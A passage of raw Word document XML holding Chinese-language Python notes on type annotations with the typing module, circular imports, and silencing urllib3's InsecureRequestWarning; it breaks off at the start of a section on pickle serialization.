      </w:r>
    </w:p>
    <w:p w14:paraId="3E21D43E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="797482F1" wp14:editId="05D06398">
            <wp:extent cx="3055620" cy="1768475"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1460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38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3055620" cy="1768475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D82897" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如上图所示，可以这样对函数的返回值的类型进行标注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2999E912" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108F2492" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7A9E06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tpying</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D33BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tpying</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行类型标注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128667D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用的几种类型，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int, float, str, List, Tuple, Dict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。接下来看几个例子：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先必须从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>typing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中导入类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4949C9CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>from typing import List, Dict, Tuple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF36CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def greeting(name: str)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76504E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 'Hello ' + name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3A782" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(greeting(188))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E2B00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167473BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>又如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C892A93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">globalObjects: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>List[ Tuple[str, GraphQLBaseObject]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0533081F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CB4204" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB04222" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE5F269" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69917ABD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部基础类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1E8146" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66522163" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>List, Tuple, Dict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，需要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来指定内部基础类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D7AD53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28214B9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def do_nothing(a: List[int], b: Tuple[int, str], c: Dict[str, int]) -&gt; Dict[str, str]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E35EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return {'key': 'value'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59479CEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B925A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>do_nothing([19], (14, 'some'), {"ha": 10})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A5C43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8260CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除此之外基础类型是可以相互嵌套的，比如字典的值是列表，列表中存放元组，于是可以这样标注：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8E9BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def do_nothing(a: Dict[str, List[Tuple[int, int, int]]], ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC2AA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD9359" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35CAA436" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>多种类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0A6E27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>不是多个参数，而是多类型，是输入参数可能存在多种类型，这种情况在</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中多态来解决。而</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>本身是弱类型，输入参数没有强制规定，这个时候该怎么办？比如传入参数可能为</w:t>
      </w:r>
      <w:r>
        <w:t>int, str, float.typing</w:t>
      </w:r>
      <w:r>
        <w:t>包给我们提供了办法，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Union</w:t>
      </w:r>
      <w:r>
        <w:t>来定义</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30B366" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="105F12BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Union[int, str, float]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5ECFD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>输入参数必须是必须是</w:t>
      </w:r>
      <w:r>
        <w:t>int, str, float.</w:t>
      </w:r>
      <w:r>
        <w:t>其中之一。如果不确定数据的类型，可以标示为</w:t>
      </w:r>
      <w:r>
        <w:t>Any</w:t>
      </w:r>
      <w:r>
        <w:t>类型，表示任意类型。如果输入参数可能是</w:t>
      </w:r>
      <w:r>
        <w:t>None</w:t>
      </w:r>
      <w:r>
        <w:t>值，也可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Union</w:t>
      </w:r>
      <w:r>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1257B276" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4966266B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Union[str, None]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDCB0A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237127EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Optional[str]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47153FF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是可选类型的意思</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15436ED3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56FF5FCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数作为输入参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B42CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>如果函数作为输入参数，如何标记类型呢？其实也不复杂，函数是</w:t>
      </w:r>
      <w:r>
        <w:t>callable</w:t>
      </w:r>
      <w:r>
        <w:t>的类型，同样</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>指定传入和传出参数即可。我们来看一个求和的函数，第一个参数就是函数。</w:t>
      </w:r>
      <w:r>
        <w:t>add_all</w:t>
      </w:r>
      <w:r>
        <w:t>只是把所有的元素相加，至于对每个元素做什么操作，取决于传入的函数了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310E413C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE96C53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def add_all(f: Callable[[int], int], params: List[int]):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED513E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return sum(map(f, params))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26528DFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481E1447" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(add_all(lambda x: x**2, list(range(1, 10))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FCBAD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E97A14B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="422" w:name="_Toc159779870"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交叉引用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="422"/>
    </w:p>
    <w:p w14:paraId="0A138B06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC91150" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不允许交叉引用，如下图，两个文件互相交叉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会导致报错的堆栈信息中说无法导入包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA0360" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B50677E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2689846E" wp14:editId="04AA2B02">
            <wp:extent cx="4100830" cy="2159635"/>
            <wp:effectExtent l="0" t="0" r="1397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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4100830" cy="2159635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F4316" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DD7591" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="423" w:name="_Toc159779871"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络请求的报错</w:t>
      </w:r>
      <w:bookmarkEnd w:id="423"/>
    </w:p>
    <w:p w14:paraId="48F3F598" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加如下内容，可以关闭使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之类的网络请求的报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5221B1B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71ABB017" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import urllib3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F50CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from urllib3.exceptions import InsecureRequestWarning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B986C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>urllib3.disable_warnings(InsecureRequestWarning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B339CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Insecure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2F9AE8" w14:textId="33569584" w:rsidR="00E47208" w:rsidRDefault="00E47208" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AAB869" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13513663" w14:textId="43CB7587" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="424" w:name="_Toc159779872"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="424"/>
    </w:p>
    <w:p w14:paraId="1FF78F8A" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56372A33" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
